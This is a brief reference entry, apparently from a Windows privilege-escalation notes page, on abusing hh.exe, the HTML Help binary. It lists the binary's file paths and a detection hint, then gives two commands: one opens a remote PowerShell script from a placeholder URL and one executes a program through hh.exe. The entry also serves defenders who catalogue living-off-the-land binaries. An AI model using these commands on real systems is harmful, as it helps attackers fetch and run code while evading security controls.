03 : /Privilege-escalation Windows#

~/ cat Hh.exe.md

Binary used for processing chm files in Windows

Paths:

C:\Windows\System32\hh.exe
C:\Windows\SysWOW64\hh.exe

Detection: hh.exe should normally not be in use on a normal workstation

Download

Open the target PowerShell script with HTML Help.

HH.exe http://some.url/script.ps1

Execute

Executes calc.exe with HTML Help.

HH.exe c:\windows\system32\calc.exe